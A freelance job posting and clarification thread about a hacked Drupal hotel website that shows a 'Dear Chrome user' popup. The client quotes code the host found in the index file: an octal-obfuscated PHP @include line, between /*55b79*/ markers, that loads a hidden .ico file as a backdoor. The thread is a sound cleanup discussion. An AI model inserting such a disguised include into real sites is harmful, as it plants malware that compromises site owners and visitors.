Drupal update

  • Posted:
  • Proposals: 0
  • Remote
  • #2103092
  • Expired
  • 0

Description

Experience Level: Intermediate
Hi Ross,

We have an issue with the Pontlands Park website that you updated a few months back. People are getting a strange message when they visit the site. The hosting company have ran a report and said it's due to an old version of Drupal. I have attached screenshots are you able to look please?

Thanks

Justine

New Proposal

Create an account now and send a proposal now to get this job.

Sign up

Clarification Board Ask a Question

  • Ross H.

    Hi Justin,

    Are you still facing any problems?

    Best,
    Ross

  • Ross H.

    Hi Justine,

    The project was definitely updated. I have seen the message which says Dear Chrome user..., this could be because of either the person who is opening site has a malware in the chrome / pc or the site could be attached and someone may have added malware on the site.

    I will check the updates. Drupal regularly pushes the latest software patches. So it is possible that there could be a new version available.

    However, if you look at the report from the hosting providers it's not a threat, it's just a warning. I have also looked at the site http://pontlandsparkhotel.co.uk/ but I don't see any such popup that you gave a screenshot of.

    Justine M.10 Aug 2018

    Hi Ross,

    Thanks for your prompt reply.

    The hosting company have sent this message. Does that mean anything to you?

    The hosting company have found code added to the index file causing the issue (please see below) can you remove it?





    Code inserted in index file


    /*55b79*/



    @include "\057d\141t\141/\167e\142/\166i\162t\165a\154s\0571\0670\0676\070/\166i\162t\165a\154/\167w\167/\155o\144u\154e\163/\146i\154e\057.\1467\1433\143f\065c\056i\143o";



    /*55b79*/



    Further info: https://www.drupal.org/forum/support/post-installation/2018-05-22/clean-up-hacked-site

    Thanks

    Justine

    Ross H.10 Aug 2018

    Hi Justine,

    This means the site is hacked.

    The site needs to be cleaned up. Perhaps it will be good to ask the hosting company when the index.php file which is hacked was changed. That will help us to know the tentative time of the hacking attempt.

    Best,
    Ross